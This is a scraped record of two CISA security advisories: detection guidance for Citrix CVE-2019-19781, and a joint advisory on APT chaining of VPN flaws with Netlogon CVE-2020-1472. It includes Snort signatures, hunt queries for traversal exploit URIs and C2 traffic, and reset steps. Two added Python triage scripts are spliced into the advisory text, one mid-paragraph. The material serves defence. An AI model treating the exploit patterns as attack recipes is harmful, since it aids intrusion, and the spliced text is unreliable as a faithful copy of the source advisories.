Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for an `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context:** Network Alert\n\n**Type:** Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. 
The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"|0d0a|Connection: Keep-Alive\"; content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e742e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f5343524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type:** Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). 
Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. 
As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. 
An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. 
\n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link 
to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:09:48", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. 
The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. 
To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. 
The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. 
As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). 
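Patched domain controllers record every Netlogon secure channel negotiation that would have been vulnerable, and the Mitigations section of this advisory tells administrators to monitor those events and clear the offending devices before turning on enforcement mode. The script below is an added example and not part of the advisory: it uses the System-log Event IDs 5827 through 5831 that Microsoft documents for the CVE-2020-1472 update (KB4557222, linked under Mitigations), while the three-column CSV layout, the hostnames and the timestamps are constructed for the example rather than taken from a real export.

```python
"""Triage Netlogon secure channel events exported from domain controllers.

Added example; it is not part of the CISA/FBI advisory. The Event IDs are the
ones Microsoft documents for the CVE-2020-1472 update (KB4557222). The CSV
layout and the sample rows are constructed and are NOT a real event export.
"""
import csv
import io
from collections import defaultdict

# Event IDs written to the System log by patched domain controllers (KB4557222).
DENIED_EVENTS = {5827, 5828}      # vulnerable connection refused (enforcement working)
ALLOWED_VULNERABLE = {5829}       # vulnerable connection still allowed (enforcement not yet on)
ALLOWED_BY_POLICY = {5830, 5831}  # allowed only because an exception group policy lists the account

# Constructed sample export (hypothetical hosts; a 4624 logon row is included as noise).
SAMPLE_EXPORT = """TimeCreated,EventID,SamAccountName
2020-10-01T08:12:03,5829,LEGACY-NAS$
2020-10-01T08:12:45,5829,LEGACY-NAS$
2020-10-01T09:01:10,5830,SCADA-HMI01$
2020-10-01T09:05:22,5827,LEGACY-NAS$
2020-10-01T09:30:00,5831,PARTNERDOMAIN$
2020-10-01T10:00:00,4624,WS-042$
"""


def triage_netlogon_events(csv_text: str) -> dict:
    """Group the Netlogon-related events by account.

    Returns {account: {"denied": n, "allowed_vulnerable": n, "allowed_by_policy": n}}.
    Rows with other Event IDs, or without a numeric Event ID, are ignored.
    """
    summary = defaultdict(lambda: {"denied": 0, "allowed_vulnerable": 0, "allowed_by_policy": 0})
    for row in csv.DictReader(io.StringIO(csv_text)):
        try:
            event_id = int(row["EventID"])
        except (KeyError, TypeError, ValueError):
            continue  # malformed row: skip it rather than abort the whole triage
        account = (row.get("SamAccountName") or "").strip()
        if event_id in DENIED_EVENTS:
            summary[account]["denied"] += 1
        elif event_id in ALLOWED_VULNERABLE:
            summary[account]["allowed_vulnerable"] += 1
        elif event_id in ALLOWED_BY_POLICY:
            summary[account]["allowed_by_policy"] += 1
    return dict(summary)


def accounts_needing_remediation(summary: dict) -> list:
    """Accounts that were still granted a vulnerable Netlogon channel.

    5829 means enforcement mode is not on yet; 5830/5831 mean someone added an
    explicit exception. Either way the device must be patched (or the
    exception removed) before enforcement can be enabled without breaking it.
    """
    return sorted(a for a, c in summary.items()
                  if c["allowed_vulnerable"] or c["allowed_by_policy"])


def enforcement_ready(summary: dict) -> bool:
    """True when no account in the export was allowed a vulnerable connection."""
    return not accounts_needing_remediation(summary)


if __name__ == "__main__":
    s = triage_netlogon_events(SAMPLE_EXPORT)
    for account, counts in sorted(s.items()):
        print(f"{account:16} {counts}")
    print("needs remediation:", accounts_needing_remediation(s))
    print("ready for enforcement mode:", enforcement_ready(s))
```

Run it over the System log of every domain controller (filtered to these Event IDs and exported with the same three columns); an empty remediation list across all controllers is the signal that enforcement mode can be switched on.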
Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).

### Persistence

Once system access has been achieved, the APT actors abuse legitimate credentials (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.

### Mitigations

Organizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an “assume breach” mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.

### Keep Systems Up to Date

Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs.
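The affected-version ranges that Table 1 lists can be turned into an automated inventory check. The following is an added example and not code from the advisory: the ranges are copied from Table 1 for FortiOS (CVE-2018-13379), PAN-OS (CVE-2020-2021) and Pulse Connect Secure (CVE-2019-11510), the hostnames in the sample inventory are constructed, and Pulse's `9.0R3.3` release notation is assumed to compare as the numeric tuple `(9, 0, 3, 3)`. A version outside the listed ranges is reported as such, not as "fixed"; fixed releases are confirmed against the vendor advisories linked in the table.

```python
"""Check firmware versions from a device inventory against the affected
ranges in Table 1 of this advisory.

Added example, not part of the advisory. Ranges are the ones Table 1 gives for
FortiOS (CVE-2018-13379), PAN-OS (CVE-2020-2021) and Pulse Connect Secure
(CVE-2019-11510). The inventory under __main__ is constructed.
"""
import re

# Table 1 ranges as (lowest affected, upper bound, upper bound inclusive?).
# "earlier than X" becomes an exclusive upper bound; "all versions of 8.0"
# becomes everything from 8.0.0 up to, but excluding, 8.1.0.
AFFECTED = {
    "FortiOS": [
        ("6.0.0", "6.0.4", True),
        ("5.6.3", "5.6.7", True),
        ("5.4.6", "5.4.12", True),
    ],
    "PAN-OS": [
        ("9.1.0", "9.1.3", False),
        ("9.0.0", "9.0.9", False),
        ("8.1.0", "8.1.15", False),
        ("8.0.0", "8.1.0", False),
    ],
    "Pulse Connect Secure": [
        ("9.0R1", "9.0R3.3", True),
        ("8.3R1", "8.3R7", True),
        ("8.2R1", "8.2R12", True),
        ("8.1R1", "8.1R15", True),
    ],
}


def parse_version(text: str) -> tuple:
    """'6.0.4' -> (6, 0, 4); Pulse's '9.0R3.3' -> (9, 0, 3, 3).

    Anything that is not purely numeric after splitting (a hotfix suffix,
    an empty string) raises, so a caller cannot mistake it for "safe".
    """
    parts = re.split(r"[.R]", text.strip())
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in parts)


def in_range(version: str, low: str, high: str, high_inclusive: bool) -> bool:
    v, lo, hi = parse_version(version), parse_version(low), parse_version(high)
    return lo <= v and (v <= hi if high_inclusive else v < hi)


def is_affected(product: str, version: str) -> bool:
    """True when the version falls inside any Table 1 range for the product."""
    try:
        ranges = AFFECTED[product]
    except KeyError:
        raise KeyError(f"no Table 1 range encoded for {product!r}") from None
    return any(in_range(version, *r) for r in ranges)


def audit(inventory) -> list:
    """inventory: iterable of (host, product, version).

    Returns a list of (host, product, version, status). Unknown products and
    unparseable versions are reported as UNKNOWN, never as safe, so that a
    human looks at them.
    """
    findings = []
    for host, product, version in inventory:
        try:
            status = "AFFECTED" if is_affected(product, version) else "not in listed range"
        except (KeyError, ValueError) as exc:
            status = f"UNKNOWN ({exc})"
        findings.append((host, product, version, status))
    return findings


if __name__ == "__main__":
    # Constructed inventory (hypothetical hostnames).
    sample = [
        ("fw-edge-01", "FortiOS", "6.0.4"),
        ("fw-edge-02", "FortiOS", "6.0.5"),
        ("pa-dc-01", "PAN-OS", "8.0.20"),
        ("pa-dc-02", "PAN-OS", "9.1.3"),
        ("vpn-01", "Pulse Connect Secure", "9.0R3.3"),
        ("vpn-02", "Pulse Connect Secure", "9.0R4"),
        ("lb-01", "BIG-IP", "15.1.0"),
    ]
    for host, product, version, status in audit(sample):
        print(f"{host:12} {product:22} {version:10} {status}")
```

Feed it the output of whatever inventory source you already trust (CMDB export, vendor management console); the point of the UNKNOWN status is that a hotfix suffix or a product the table does not cover never silently passes.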
See table 1 for patch information on CVEs mentioned in this report.

_Table 1: Patch information for CVEs_

| **Vulnerability** | **Vulnerable Products** | **Patch Information** |
|---|---|---|
| [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | FortiOS 6.0: 6.0.0 to 6.0.4; FortiOS 5.6: 5.6.3 to 5.6.7; FortiOS 5.4: 5.4.6 to 5.4.12 | [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>); [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) |
| [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | BIG-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) | [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15; Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15 | [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) |
| [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; Sentry versions 9.7.2 and earlier, and 9.8.0; Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier | [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) |
| [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1 | [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) |
| [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; all versions of PAN-OS 8.0 (EOL) | [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) |
| [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Windows Server 2008 R2 for x64-based Systems Service Pack 1; Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation); Windows Server 2012; Windows Server 2012 (Server Core installation); Windows Server 2012 R2; Windows Server 2016; Windows Server 2019; Windows Server 2019 (Server Core installation); Windows Server, version 1903 (Server Core installation); Windows Server, version 1909 (Server Core installation); Windows Server, version 2004 (Server Core installation) | [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) |

### Comprehensive Account Resets

If [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse are detected, it should be assumed that the APT actors have compromised AD administrative accounts; the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones are built in the new forest. This will need to be completed on on-premises as well as Azure-hosted AD instances.

Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.

It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.

 1. Create a temporary administrator account, and use this account only for all administrative actions.
 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5).
 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary).
 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
    1. User accounts (forced reset with no legacy password reuse)
    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])
    3. Service accounts
    4. Directory Services Restore Mode (DSRM) account
    5. Domain Controller machine account
    6. Application passwords
 5. Reset the `krbtgt` password again.
 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary).
 7. Reboot domain controllers.
 8. Reboot all endpoints.

The following accounts should be reset:

 * AD Kerberos Authentication Master (2x)
 * All Active Directory Accounts
 * All Active Directory Admin Accounts
 * All Active Directory Service Accounts
 * All Active Directory User Accounts
 * DSRM Account on Domain Controllers
 * Non-AD Privileged Application Accounts
 * Non-AD Unprivileged Application Accounts
 * Non-Windows Privileged Accounts
 * Non-Windows User Accounts
 * Windows Computer Accounts
 * Windows Local Admin

### CVE-2020-1472

To secure your organization’s Netlogon channel connections:

